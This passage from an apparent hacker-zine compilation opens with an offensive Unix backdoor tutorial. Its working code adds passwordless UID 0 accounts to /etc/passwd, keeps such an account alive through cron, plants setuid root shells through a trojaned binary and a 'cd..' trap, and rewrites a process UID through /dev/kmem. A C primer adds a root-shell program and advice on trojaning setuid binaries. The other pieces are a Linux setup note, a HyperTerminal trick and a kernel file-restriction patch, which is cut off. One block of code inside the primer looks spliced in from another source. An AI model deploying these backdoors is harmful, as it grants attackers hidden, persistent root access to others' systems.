        fd=fopen("/etc/passwd","a+");
        fprintf(fd,"hax0r::0:0::/:/bin/bash\n");
        printf("\ndone.\n");
        printf("uid 0 and gid 0 account added\n\n");
        break;
    case '6':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("Executing suid shell..\n");
        execl("/bin/sh");
        break;
    case '7':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nInfo... (-i)\n");
        printf("\n3 - Adds entries to /etc/services & /etc/inetd.conf giving you\n");
        printf("a root shell on port 2000. example: telnet 2000\n\n");
        printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
        printf("executed gives you a root shell. example:/tmp/.sh\n\n");
        printf("5 - Adds an account with uid and gid 0 to the passwd file.\n");
        printf("The login is 'mutiny' and there is no passwd.");
        break;
    case '8':
        printf("\nBackhore BETA by Theft\n");
        printf("\nhttp://theft.bored.org\n");
        printf("theft@cyberspace.org\n\n");
        break;
    default:
        printf("unknown command: %d\n", cmd);
        break;
    }
}
<-->

[Advanced]

Crontab is a very powerful tool for the admin. Cron is used to schedule jobs to do at certain times of the day, month, or year. Can you see where this is going? Because of this, you can make a very powerful backdoor. With Cron you could make it spawn a program at say 3:00 am in the morning, when the admin is asleep, so you can quickly get in and do as you like and get out before he ever notices; its possibilities are endless. The root crontab jobs are located in /var/spool/crontab/root and can be manually edited. The Cron lines will look something like this.

(1) (2) (3) (4) (5) (6)
0   0   *   *   3   /usr/bin/updatedb

1. Minute (0-60)
2. Hour (0-23)
3. Day (1-31)
4. Month (1-12)
5. Day of week (1-7)
6. is the command (or shell script) to execute.

The above shell script is executed on Wednesday. To create a backdoor in cron just add your custom line to /var/spool/crontab/root. You could make a program or shell script in the crontab which checked every week or so if the account we created earlier is still in /etc/passwd. To start this, you would add this line to /var/spool/crontab/root:

0 0 * * * /usr/bin/retract

<++> backdoor/backdoor.sh
#!/bin/csh
# Is our account still alive in /etc/passwd? We'll see.
set evilflag = (`grep eviluser /etc/passwd`)

if($#evilflag == 0) then        # Is he there?
    set linecount = `wc -l /etc/passwd`
    cd                          # Do this at home.
    cp /etc/passwd ./temppass   # Safety first.
    @ linecount[1] /= 2
    @ linecount[1] += 1         # we only want 2 temp files
    split -$linecount[1] ./temppass
    # passwd string optional
    echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd       # or whatever it was beforehand
    rm ./xa* ./temppass
    echo Done...
else
endif
<-->

[Complex]

You could of course write a trojan and place it in /bin and make the program create a suid shell if the right arguments are given. This is a very good trojan if utilized correctly. You could also replace a little used program in /bin, such as dialog, with your trojan to make it even more stealthy. Here's a program which, if given the correct argument, will create a suid shell in /tmp.

<++> backdoor/backdoor3.c
#include <stdio.h>
#define pass "triad"
#define BUFFERSIZE 6

int main(argc, argv)
int argc;
char *argv[];
{
    int i=0;

    if(argv[1]){
        if(!(strcmp(pass,argv[1]))){
            system("cp /bin/csh /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
            system("chown root /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
        }
    }
    printf("372f: Invalid control argument, unable to initialize. Retrying");
    for(;i<10;i++){
        fprintf(stderr,".");
        sleep(1);
    }
    printf("\nAction aborted after 10 attempts.\n");
    return(0);
}
<-->

[Diverse]

Because the kernel keeps its parameters in memory, it is possible for you to modify the memory and use it to change your process to the UID of 0. To do this, /dev/kmem must be world readable and writable. The program below will seek to your page in memory and change your UID, effectively spawning you a suid root shell.
<++> backdoor/kmemthief.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/user.h>
#define pass "triad"

struct user userpage;
long address(), userlocation;

int main(argc, argv, envp)
int argc;
char *argv[], *envp[];
{
    int count, fd;
    long where, lseek();

    if(argv[1]){
        if(!(strcmp(pass,argv[1]))){
            fd=open("/dev/kmem",O_RDWR);
            if(fd<0){
                printf("Cannot read or write to /dev/kmem\n");
                perror(argv);
                exit(10);
            }
            userlocation=address();
            where=lseek(fd,userlocation,0);
            if(where!=userlocation){
                printf("Cannot seek to user page\n");
                perror(argv);
                exit(20);
            }
            count=read(fd,&userpage,sizeof(struct user));
            if(count!=sizeof(struct user)){
                printf("Cannot read user page\n");
                perror(argv);
                exit(30);
            }
            printf("Current UID: %d\n",userpage.u_ruid);
            printf("Current GID: %d\n",userpage.u_rgid);
            userpage.u_ruid=0;
            userpage.u_rgid=0;
            where=lseek(fd,userlocation,0);
            if(where!=userlocation){
                printf("Cannot seek to user page\n");
                perror(argv);
                exit(40);
            }
            write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
            execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
        }
    }
}
<-->

[The Clumsy]

Have you ever been pounding away working a problem with your box and accidentally typed "cd.." instead of "cd .."? It happens to me because before Linux I used Windows and MS-DOS for years, and the commands are still stuck in my head. Well every now and then, the admin will type that; wouldn't you want to take advantage of his mistake? What if when he typed cd.. it would trigger your trojan program? That makes it a semi remote backdoor, seeing as you don't have to be logged into the box to trigger it; the truth is, you can! Here's a small program I wrote to take advantage of human error.

<++> backdoor/dumb.c
/* This program will add a UID 0 account to /etc/passwd when the admin accidentally types cd..
Also to cover up itself it will perform the cd action so as the admin would never notice his mistake */ #include #include main() { FILE *fd; fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/root:/bin/sh\n"); system("cd"); } <--> Now compile that program and put it somewhere that it looks like it belongs. It is also a good idea if you are doing this from a suid shell to change it's ownership by doing "chown root out" if the programs name was out, changing the group would also be a good idea, whats the reasoning behind this? Well if the admin deos a "ls -alF" and sees a suid root program which owner is an unprivileged account, he's going to figure out it's a backdoor and remove it. Ok, now that you've compiled the program(lets say it was called out in /bin) then you would do this command to "link" cd.. and /bin/out together, do a "ln cd.. /bin/out" and now when the admin makes that vital mistake, you'll have access to the system once again. [Closure] This article was meant to give you a feel for creating, maintaining, and using backdoors as well as removing them. You may use this information any way you like, but be still use your judgement on how you use them and how much it will effect the system and it's performance. For any questions or comments, please send mail to meb_@piratededucation.com. Linux SetUp Tutorial by Psionic =-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-= --Copyrighted material-- This document may be freely distributed but not for commecrial use. Nothing in this docuent may be romved and/or edited. Author's name must be named in document. This document may not be flamed.. =P (it is my first doc...) -- Linux SetUp The setup of the linux os may differ per distro this tut will have the basics that will be the same for almost every linux distro. It will be divided in a couple of really simple steps, this document will not go into configuration of diff. hardware devices etc.. that may differ per machine. Ok the steps will be the following: 1. 
In case you have no bootdisk, you will have to make one. In case you DO have a bootdisk WTF ARE YOU DOING IN THIS DOC? it is so easy if you already have a bootdisk handy.. Ok I hope you have windows running b'c it is very handy for making the bootdisk (that is the only actual purpose windows has; u can make linux bootdisks pretty easy) Ok; if you have the linux os on cd insert the cd into the cd-rom drive. Otherwise just go to the dir it is in, now insert a formatted floppy disk into our floppy drive (it may also be inserted into the cd-rom drive, but i doubt if that will work) Now select the right image files for the bootup and put them on the floppy, if you don't know what files to pick look for a setup text (hehe) or go to the website, and go to 'how to setup' (hehe again) 2. When you have found the right files, insert the bootdisk and bootup. You may have to disable your C:/ drive in your BIOS first b'c some computers wont read the floppydrive first and they wont boot into the linux setup. 3. Configure everything, and bootup again and, BEHOLD you have linux installed. ( i know it looks all very easy but it needs some practice, and you may want to make a backup of your C:/ drive in case of partitioning etc..) Ok I think was about it, I hope you learned something by reading this. Have fun and Good luck :) Written by Psionic petersen909@hotmail.com ( yeah this is my lame flame adress) You can always talk to me at irc.box5.net channel: #wargames. Cya Hyperterminal trick =-=+=-=+=-=+=-=+=-=+=-=+=-= What's needed ------------------ -- Two computers -- Two phonelines -- Windows HyperTerminal What are we doing? ------------------ We are connecting two computers via a Windows program called "HyperTerminal." This means you can connect your Windows machine with another even if the other end isn't running Windows. The Linux equivalent is minicom. Uses of this. 
------------------

This is very useful for transmitting files which are too big to fit on floppy disks, or for transmitting from incompatible media (i.e. from a Zip disk to a computer which has no Zip drive). See if you can find other useful tricks. It is also handy for sending files to a friend who isn't on-line, like a patch for a game, etc.

What to do now?
----------------------

This goes at about double the speed of a normal download. The only problem I have found with it is that the computers sometimes get de-synced (meaning one has sent more than the other can handle and the whole file doesn't get transferred), but that happens very rarely.

Start up the Windows HyperTerminal program and set the number to dial. If you dial, that's the easy part; if you are the one answering, first type the modem reset string "ATZ", wait until you see *ring* *ring* *ring*, then type "ATA" to make the modem answer, and let it connect. You can chat with your friend, but it looks bad; hey, be thankful for what you get. To send a file click the send file button and use the ZMODEM protocol, it's the best. To receive a file, just let your buddy send it; it will start downloading automatically. Be careful though: disable call waiting and try not to step on your phone cords and stuff, since that will de-sync the link, and that's a pain when it happens. When it does de-sync, just abort the send and re-send it; you'll see some weird characters on the screen but it's perfectly fine.

Well, that's it, short huh? I'm out; remember to have fun now.

~BurntAsh BurntAsh@juno.com


An introduction to C
=-=+=-=+=-=+=-=+=-=+=-=+=-=

I.   Introduction
     A) Disclaimer
     B) Introduction
     C) The Basics of the Basics
II.  Technical Nonsense
     A) C Keywords
     B) The Escape Character
III.
     Getting Down To The Nitty Gritty
     A) Constants, Variables, and Arithmetic Operators
     B) Data Types
     C) Expressions and Statements
     D) The Basics of A Function
IV.  Let The Fun Begin
     A) Writing Your First Program
     B) Using exit() In A Program
     C) Using printf() With Operators
V.   The Shady Side Of It
     A) Making A SUID Backdoor
     B) Learning How-To Trojan A SUID
VI.  Conclusion
     A) Final Words
     B) Credits


Introduction

Disclaimer:

I, psylence, the publishers of this text, and anyone else who gave this to you cannot be held responsible should you choose to use it for malicious purposes. Remember: hackers make things and crackers break them.

Introduction:

This is intended to be an introduction to C programming for the Linux operating system, which is just a flavor of Unix. C is a high-level programming language, which means that it is written with words like the ones we speak. In order for your computer to understand the program code it must first be compiled into a binary format. This will not make you into a C guru or anything, but it should at least get you started on your way into the world of geeks and nerds. ;)

The Basics:

First let's talk about the structure of a program. Before anything else you have your header files. So what exactly are header files, you ask? An #include line at the top of the program tells the compiler that the program needs a certain header (.h) file for at least one of the functions in the program to work. A header file contains the declarations of prewritten functions (the code itself lives in the C library). If you forget to include stdio.h and use the printf function, the compiler has no declaration for printf because its header (stdio.h) wasn't put in the code; old compilers warn about that, newer ones refuse to compile. After the header of the program you have the body of the program. The body contains functions, which contain statement blocks, which contain statements, which may contain more function calls. Cool, eh? At any point in the source code of a program there may be remarks (comments).
The beginning of a remark is identified by a forward slash then a star (/*) and the end of a remark by a star then a forward slash (*/).

/* This is a remark, this is only a remark! */


Technical Nonsense

C Keywords:

Keyword     Description
auto        Storage class specifier
break       Statement
case        Statement
char        Type specifier
const       Type qualifier
continue    Statement
default     Label
do          Statement
double      Type specifier
else        Statement
enum        Type specifier
extern      Storage class specifier
float       Type specifier
for         Statement
goto        Statement
if          Statement
int         Type specifier
long        Type specifier
register    Storage class specifier
return      Statement
short       Type specifier
signed      Type specifier
sizeof      Operator
static      Storage class specifier
struct      Type specifier
switch      Statement
typedef     Declaration (syntactically a storage class specifier)
union       Type specifier
unsigned    Type specifier
void        Type specifier
volatile    Type qualifier
while       Statement

The Escape Character (\):

You will definitely see the escape character in C. The \ character is the escape character. When the compiler sees a \ inside a string or character constant it knows that a "special" character is coming right after it. Here are a few of the characters that may come after the escape character.

Character   Description
\n          The newline character; moves to the beginning of the next line (on Unix this is a single line-feed byte).
\b          The backspace character; moves the cursor one space to the left.
\r          The return character; returns to the beginning of the current line.
\t          The tab character; moves to the next tab stop.
\f          The form-feed character; goes to the top of a new page.


Getting Down To The Nitty Gritty

Constants, Variables, and Arithmetic Operators:

A constant is a value that *never* changes, whereas a variable can be used to represent different values. You can think of a variable as a floppy which constantly has new data written to it, and a constant as a CD that is written once and never written over. Assigning a variable is quite simple: x = 24; assigns the value 24 to the variable x (x must have been declared first, for example with int x;). x is the variable and 24 is a constant.
You can also assign a different value to x later if you like. I don't, because I lose track, but if you have the memory for it then more power to you. :) Arithmetic operators are symbols: + - * / % are all arithmetic operators. You are probably already familiar with some of these. % was a new one for me: % gives the remainder of the first operand divided by the second operand.

Data Types:

Each variable has a data type. Some basic data types are int, char, float, and double. int stands for the integer data type, char for the character data type and float for the floating point data type; double is a floating point type as well, with more precision than float (typically about 15 significant decimal digits against about 7 for float). Each data type has a format specifier. The int format specifier is %d or %i. The char format specifier is %c. The float or double format specifier is %f. One place they are used is in a printf statement. You'll learn more about expressions and statements in the next section.

Expressions And Statements:

An expression is a combination of constants, variables, and operators used to denote a computation. In the expression c = a + 5 the variable a plus the constant 5 is assigned to the variable c. A statement is an instruction ended with a semicolon (;), usually ended with a semicolon anyhow. A few constructs are not followed by a semicolon, such as the for statement, whose body is a statement block. An example of a statement is:

printf("I can write in c\n");

A group of statements makes up a statement block. A statement block starts with an opening brace ({) and ends with a closing brace (}). Here's an example:

{
	printf("see the opening brace?\n");
	printf("now look at the closing brace.\n");
}

The Basics Of A Function:

A function may be prewritten and used simply by including the header file for that function, or you may write the function yourself. A function call is usually written as a statement:

printf("printf() is a function!\n");

As you can see the function is printf().
The basic function format is the name of the function followed by a pair of left and right parentheses. Arguments to the function are put inside the parentheses. The argument to the statement above was "printf() is a function!\n". The arguments differ depending on the function; remember to type 'man function-name' at the prompt to bring up the manual page for that function.


Let The Fun Begin

Writing Your First Program:

We are going to write a simple program to print Hello World! to standard output (your monitor). So open up your favorite editor (pico, emacs and vi usually come with Linux). The standard C compilers are cc or gcc; gcc comes with most distributions of Linux. The syntax is 'gcc file.c -o file'. Make sure that the file with the code has the .c extension or else gcc *won't* treat it as C source. I'll include the shell commands just for the inexperienced.

$ pico hello.c

<++> basicC/hello.c
/* This program will print Hello World! */
#include <stdio.h>

int main(void)
{
	printf("Hello World!\n");
	return 0;
}
<-->

$ gcc hello.c -o hello
$ ./hello

Okay, that was fun eh? Not really, you say?!? Damn you, you ingrate! Just joking, but I promise I'll get into more fun code later in the paper. So let's break down this code. The first thing is the header, #include <stdio.h>, which includes the header file stdio.h. Stdio stands for STandarD Input Output. The angle brackets (<>) around it mean to look for the header file in the system include directories (/usr/include and the like) rather than the current one. If it had double quotes ("") around it, the compiler would look for the header file in the current directory before looking elsewhere. The next thing, main(), is the main function of the program. Every C program *must* have a main function. There are only 2 statements inside the statement block: the printf statement and the return statement. The return statement returns the value 0 in this case, which becomes the program's exit status: 0 tells the shell the program succeeded, and any other value (usually 1) means failure. This is usually used to indicate errors in a program.
Using exit() In A Program:

Above you learned that return is used to hand a value back from a function. In this example we'll use the exit function instead of the return statement.

<++> basicC/exit.c
/* This will use the exit function instead of return */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	printf("Hello again.\n");
	exit(0);
}
<-->

So let's break this down real quick and move on. You have the header, but wait... what's this? A new header file?!? Yep, because the exit function is declared in the header file stdlib.h. Stdlib stands for STandarD LIBrary. exit(0) ends the program right there and 0 becomes the exit status, so main never gets to a return statement. (You will see "void main()" in older code: the void return type means a function returns no value, but main should be declared int, and gcc warns about void main.) The statement block for main has 2 statements in it: the printf statement and the exit statement.

Using printf() With Operators:

So we've seen how to print to standard output. Now let's try putting all the other stuff you learned to use, eh? Check out this example:

<++> basicC/printf.c
#include <stdio.h>

int main(void)
{
	int y;

	y = 2 + 5;
	printf(" 2 + 5 = %d\n", y);
	return 0;
}
<-->

That one had a bit more meat on it, eh? Okay, let's break it down. The only header file is stdio.h. The main function is there (of course). Inside the statement block there are 4 statements: int y, y = 2 + 5, printf, and the return statement. int y; gives the variable y the int data type. y = 2 + 5 assigns the value of 2 + 5 to the variable y. The %d in the printf statement means that an integer is printed in that spot. The \n means newline. The y after the comma in the printf statement means that the integer value printed for %d is y. Then the value 0 is returned from the function.

Now take a look at the character format specifier in a program. Check out this example:

<++> basicC/printf2.c
#include <stdio.h>

int main(void)
{
	char c1, c2;

	c1 = 'h';
	c2 = 'i';
	printf("%c%c\n", c1, c2);
	return 0;
}
<-->

By this time I bet you have the hang of it, so I'll just breeze over this one. Header, main function, the data type of c1 and c2 is char, the character h is assigned to c1 and i is assigned to c2.
hi is printed to standard output and the value 0 (success) is returned.


The Shady Side Of It

Making A SUID Backdoor:

Well, first off I'll explain what SUID is. SUID stands for Set User ID. A Unix machine identifies each user with a number, the UID. The root UID is 0. Just as with the UID there is also a GID, which is your Group ID. A set-UID binary runs with the UID of the file's owner instead of the UID of whoever started it. With that in mind let's see a program that'll spawn a rootshell for you. muhahaha :P

<++> basicC/suid.c
#include <stdio.h>
#include <unistd.h>

int main(void)
{
	/* these only succeed when the effective UID is already 0; their
	   return values are not checked, so if they fail you simply stay
	   who you were and get an ordinary shell */
	setgid(0);
	setegid(0);
	setuid(0);
	seteuid(0);
	printf("Root Be Thy Name\n");
	/* argv[0] for the new program, then a NULL to end the argument list */
	execl("/bin/sh", "sh", (char *) NULL);
	return 0;
}
<-->

Okay, okay, now that will give you a root shell if the permissions on the compiled binary file are set correctly, but I'll leave that part out so that I won't be harassed by people for teaching people stuff like that. The setgid, setegid, setuid and seteuid functions set the GID, effective GID, UID and effective UID. The execl function executes the program named by its first argument ("/bin/sh"); the remaining arguments become that program's argv, ended by a NULL. So it made a shell. You already know that return just returns a value from the function. For details check out the manual pages yourself ;)

Learning How-To Trojan A SUID:

So you learned briefly what SUID programs are and the functions that go along with them. Now, a root SUID program of your own lying around is slightly obvious, so to further your shady intentions you could get the source to a SUID program that's already on the machine and add some code to spawn you a shell. This can be done with as few as 10 lines of additional code.


Conclusion

Final Words:

I know I've left out some stuff and that there's much more to be said on the subject of C programming, but this was only supposed to be an introduction. I may write another paper on it, but don't hold your breath ;) Basically, with what you've learned here you can at least get your math homework done. Or make a nifty backdoor. If you were disappointed with this paper I don't really care. :) Please redirect all flames to /dev/null or /dev/echo. Thanks and have fun!
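The set-ID calls in suid.c above are made without looking at their results. That is harmless when you are trying to gain root (you just stay who you are), but in a real set-UID program the dangerous direction is giving privilege away: if setuid() fails and nobody checks, the rest of the program keeps running as root. The following is an added example, not code from the article: drop_privileges() drops in the only order that works (supplementary groups, then GID, then UID), checks every call, and then proves the drop is permanent by trying to get root back. The function names are ours.

```c
/* Added example: checked privilege dropping, the counterpart of suid.c's
 * unchecked calls.  POSIX calls only; _DEFAULT_SOURCE is for setgroups(). */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <grp.h>
#include <sys/types.h>

/* Return 0 when the process now runs as uid:gid and cannot get root back,
   -1 (with errno set) otherwise. */
int drop_privileges(uid_t uid, gid_t gid)
{
	/* 1. supplementary groups: only root may clear them, so do it first */
	if (geteuid() == 0 && setgroups(0, NULL) != 0)
		return -1;
	/* 2. GID before UID: once the UID is unprivileged, setgid() is refused */
	if (setgid(gid) != 0)
		return -1;
	/* 3. UID last; with effective UID 0 this sets real, effective and saved UID */
	if (setuid(uid) != 0)
		return -1;

	/* 4. verify instead of trusting: the ids must really have changed ... */
	if (getuid() != uid || geteuid() != uid ||
	    getgid() != gid || getegid() != gid) {
		errno = EPERM;
		return -1;
	}
	/* ... and, unless the target is root itself, regaining root must fail.
	   If seteuid(0) works here the saved UID was still 0: reversible drop. */
	if (uid != 0 && seteuid(0) == 0) {
		errno = EPERM;
		return -1;
	}
	if (gid != 0 && setegid(0) == 0) {
		errno = EPERM;
		return -1;
	}
	return 0;
}

/* The same calls suid.c makes, but checked: 0 if we really are root now,
   -1 otherwise (errno is EPERM when the effective UID was not already 0). */
int try_become_root(void)
{
	if (setgid(0) != 0 || setuid(0) != 0)
		return -1;
	return (getuid() == 0 && geteuid() == 0) ? 0 : -1;
}

int main(void)
{
	if (try_become_root() == 0)
		printf("we are root\n");
	else
		printf("could not become root: %s\n", strerror(errno));

	/* drop to the invoking user; for a set-UID root binary getuid() is
	   the real user who started it */
	if (drop_privileges(getuid(), getgid()) != 0) {
		perror("drop_privileges");
		return 1;
	}
	printf("running as uid %d, euid %d; root is gone for good\n",
	       (int) getuid(), (int) geteuid());
	return 0;
}
```

Run it as an ordinary user and try_become_root() reports EPERM, which is exactly the case suid.c silently ignores; run it from a root-owned set-UID copy and the drop is verified rather than assumed.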
Credits:

I've got to give thanks to mcp.com for the personal bookshelf. Thanks to Sams for "C In 24 Hours" and "C In 21 Days". Thanks to everyone who's put up with my questions on the subject. A big thanks to overdose001 for proofreading this for me. Greets go out to xphantom, Remmy, all of tg0d, irishrose, lamagra, GrimKnight, and everyone else.

-=-

Very cool, informative zine, unlike so many others, especially for a number one issue; quite impressive - two "Kevin's" up! - Ed

@HWA

157.0 Paper: Some Extra Security In The Linux Kernel - Auditfile by {}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by {}

Some Extra Security In The Linux Kernel - Auditfile
a paper by Frank van Vliet alias {}
karin@root66.nl.eu.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RooT66       http://root66.nl.eu.org
ShellOracle  http://www.shelloracle.cjb.net
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

First read:
  Kernel Hackers Guide                        - http://www.linuxhq.com/guides
  The Linux Kernel                            - http://www.linuxhq.com/guides
  The Linux Kernel Module Programming Guide   - http://www.linuxhq.com/guides

The tarball can be downloaded from http://root66.nl.eu.org/karin/auditfile-0.39.tar.gz

----------[ about me

I'm Frank van Vliet alias {}, networking/security/linux freak and leader of RooT66 (http://root66.nl.eu.org). You can contact me at karin@root66.nl.eu.org

----------[ introduction

There is no such thing as 100% security, so why act as if you are safe because you download the latest patches? 'My script automatically downloads the latest patches and installs them, my box is secure' - right. Why not flip it over and say: every process is insecure. Every process has a goal; let's give it permission to accomplish that goal and restrict it as much as possible.
Auditfile is a security patch I wrote some time ago that gives the opportunity to restrict the usage of files per process, so that we can say:

- Our httpserver can only
  read:                 /usr/local/apache/conf/*
                        /usr/local/apache/htdocs*
                        /usr/local/apache/cgi-bin/*
  write:                /usr/local/apache/logs/*
  both read and write:  /usr/local/apache/cgi-bin/guestbook_database/*

----------[ how to add those security options

------------------[ task_struct

Every process has its own task_struct in the global array of current tasks (task_list). This task_struct contains things like filename, environment, uid, gid, euid, and so on. This seems to be the right place to add

   char *auditfile;      // points to the memory where the rules for auditfile are put
   int   auditfile_len;  // size of the memory used for the auditfile rules

We can find struct task_struct in /usr/src/linux/include/linux/sched.h, so add that char * and that int to the task_struct.

------------------[ How should this memory look like?

I came up with the following map of the memory.

Flags: read = 1, write = 2, both read and write = 3

The buffer is a sequence of rules, each one a NUL byte followed by the flag byte and the match string, and the list ends with two NUL bytes:

   \0 flag match \0 flag match \0 flag match \0 flag match ... \0\0

This cannot be built with a single sprintf() call, since a \0 inside the format string would end the format; the module below builds the buffer byte by byte.

Example:

   read  /usr/bin/*
   read  /lib/*
   read  /etc*
   both  /tmp*
   write /tmp/write/*

would look like

   \0\1/usr/bin/*\0\1/lib/*\0\1/etc*\0\3/tmp*\0\2/tmp/write/*\0\0

------------------[ how do we get this memory attached to new processes

I wrote a little kernel module that allocates memory, fills it with rules, and attaches that memory to the auditfile field of the task_struct of the process to edit. Here it is:

-----[ WARNING ADULT CONTENTS ]-----
#include <linux/kernel.h>
#include <linux/module.h>
#if CONFIG_MODVERSIONS==1
#define MODVERSIONS
#include <linux/modversions.h>
#endif
/* headers the code below needs */
#include <linux/sched.h>    /* task_struct, for_each_task, tasklist_lock */
#include <linux/malloc.h>   /* kmalloc/kfree on 2.2 */
#include <linux/version.h>
#include <linux/string.h>
#include <linux/errno.h>
#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
#endif /* KERNEL_VERSION */
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,2,0)
/* (a further include belonged here; its name is lost and nothing below depends on it) */
#endif

int pid = 0;
char *command;              /* accepted but not used */
char *parm;
char parsedrule[0xFFFF];    /* sorry, very ugly, but too lazy to fix ((: */
char *parsedrulereal;

MODULE_PARM(pid, "i");
MODULE_PARM(command, "s");
MODULE_PARM(parm, "s");

/* append the "\0<flag>" header of a rule at j; returns the new j */
static int put_flag(int j, char flag)
{
	parsedrule[j] = 0;
	parsedrule[j + 1] = flag;
	return j + 2;
}

int init_module(void)
{
	int i, j = 0;
	struct task_struct *p;

	if (parm == NULL || strlen(parm) * 2 + 2 > sizeof(parsedrule))
		return -EINVAL;

	/* parse "r/path w/path b/path ..." into "\0\1/path\0\2/path\0\3/path\0\0":
	   a letter at the start or right after a space is a flag, spaces are
	   dropped, everything else is part of the match string */
	for (i = 0; parm[i] != 0; i++) {
		if (i == 0 || parm[i - 1] == ' ') {
			switch (parm[i]) {
			case 'r': j = put_flag(j, 1); continue;
			case 'w': j = put_flag(j, 2); continue;
			case 'b': j = put_flag(j, 3); continue;
			}
		}
		if (parm[i] != ' ')
			parsedrule[j++] = parm[i];
	}
	parsedrule[j] = 0;
	parsedrule[j + 1] = 0;

	/* allocate before taking tasklist_lock: GFP_KERNEL may sleep */
	parsedrulereal = (char *) kmalloc(j + 2, GFP_KERNEL);
	if (parsedrulereal == NULL)
		return -ENOMEM;
	memcpy(parsedrulereal, parsedrule, j + 2);

	read_lock(&tasklist_lock);
	for_each_task(p) {
		if (p->pid == pid) {
			if (p->auditfile_len > 0)
				kfree(p->auditfile);
			p->auditfile = parsedrulereal;
			p->auditfile_len = j + 2;
			parsedrulereal = NULL;  /* now owned by the task */
			break;
		}
	}
	read_unlock(&tasklist_lock);

	if (parsedrulereal != NULL) {   /* no task with that pid */
		kfree(parsedrulereal);
		return -ESRCH;
	}
	return 0;
}

void cleanup_module(void)
{
}
-----[ END OF ADULT CONTENTS ]-----

This module attaches memory to a pid; you load it with

   insmod auditfile.o pid=PID parm="r/usr/bin/* r/etc/* r/lib/* b/tmp* w/tmp/write/*"

I made a couple of tools to automate this when a process is started; you can find them in auditfile-0.39.tar.gz

------------------[ copying the char *auditfile and int auditfile_len to new processes

Of course we want child processes of the processes we restricted to run with the same auditfile rules, so we add a couple of lines to /usr/src/linux/kernel/fork.c

-----[ WARNING ADULT CONTENTS ]-----
int do_fork(unsigned long clone_flags, unsigned long usp, struct pt_regs *regs)
{
	int nr;
	int retval = -EINVAL;
	struct task_struct *p;
	struct semaphore sem = MUTEX_LOCKED;

	/*
	 * Disallow unknown clone(2) flags, as well as CLONE_PID, unless we are
	 * the boot up thread.
	 *
	 * Avoid taking any branches in the common case.
	 */
	if (clone_flags & (-(signed long)current->pid >> (sizeof(long) * 8 - 1)) &
	    ~(unsigned long)(CSIGNAL | CLONE_VM | CLONE_FS | CLONE_FILES |
			     CLONE_SIGHAND | CLONE_PTRACE | CLONE_VFORK))
		goto fork_out;

	current->vfork_sem = &sem;

	retval = -ENOMEM;
	p = alloc_task_struct();
	if (!p)
		goto fork_out;

	*p = *current;

	/* INCLUDED FOR AUDITFILE */
	/* "*p = *current" copied the parent's pointer; the child must not share
	   (or free) the parent's buffer, it gets its own copy further down */
	p->auditfile = NULL;
	p->auditfile_len = 0;
	/* END OF INCLUDED FOR AUDITFILE */

	down(&current->mm->mmap_sem);
	lock_kernel();

	retval = -EAGAIN;
	if (p->user) {
		if (atomic_read(&p->user->count) >= p->rlim[RLIMIT_NPROC].rlim_cur)
			goto bad_fork_free;
		atomic_inc(&p->user->count);
	}

	{
		struct task_struct **tslot;
		tslot = find_empty_process();
		if (!tslot)
			goto bad_fork_cleanup_count;
		p->tarray_ptr = tslot;
		*tslot = p;
		nr = tslot - &task[0];
	}

	if (p->exec_domain && p->exec_domain->module)
		__MOD_INC_USE_COUNT(p->exec_domain->module);
	if (p->binfmt && p->binfmt->module)
		__MOD_INC_USE_COUNT(p->binfmt->module);

	p->did_exec = 0;
	p->swappable = 0;
	p->state = TASK_UNINTERRUPTIBLE;

	copy_flags(clone_flags, p);
	p->pid = get_pid(clone_flags);

	/*
	 * This is a "shadow run" state. The process
	 * is marked runnable, but isn't actually on
	 * any run queue yet.. (that happens at the
	 * very end).
	 */
	p->state = TASK_RUNNING;
	p->next_run = p;
	p->prev_run = p;

	p->p_pptr = p->p_opptr = current;
	p->p_cptr = NULL;
	init_waitqueue(&p->wait_chldexit);
	p->vfork_sem = NULL;

	p->sigpending = 0;
	sigemptyset(&p->signal);
	p->sigqueue = NULL;
	p->sigqueue_tail = &p->sigqueue;

	spin_lock_init(&p->priv_lock);
	p->priv = 0;
	p->ppriv = current->priv;

	p->it_real_value = p->it_virt_value = p->it_prof_value = 0;
	p->it_real_incr = p->it_virt_incr = p->it_prof_incr = 0;
	init_timer(&p->real_timer);
	p->real_timer.data = (unsigned long) p;

	p->leader = 0;		/* session leadership doesn't inherit */
	p->tty_old_pgrp = 0;
	p->times.tms_utime = p->times.tms_stime = 0;
	p->times.tms_cutime = p->times.tms_cstime = 0;
#ifdef __SMP__
	{
		int i;
		p->has_cpu = 0;
		p->processor = current->processor;
		/* ?? should we just memset this ?? */
		for (i = 0; i < smp_num_cpus; i++)
			p->per_cpu_utime[i] = p->per_cpu_stime[i] = 0;
		spin_lock_init(&p->sigmask_lock);
	}
#endif
	p->lock_depth = -1;		/* -1 = no lock */
	p->start_time = jiffies;

	retval = -ENOMEM;
	/* copy all the process information */
	if (copy_files(clone_flags, p))
		goto bad_fork_cleanup;
	if (copy_fs(clone_flags, p))
		goto bad_fork_cleanup_files;
	if (copy_sighand(clone_flags, p))
		goto bad_fork_cleanup_fs;
	if (copy_mm(nr, clone_flags, p))
		goto bad_fork_cleanup_sighand;
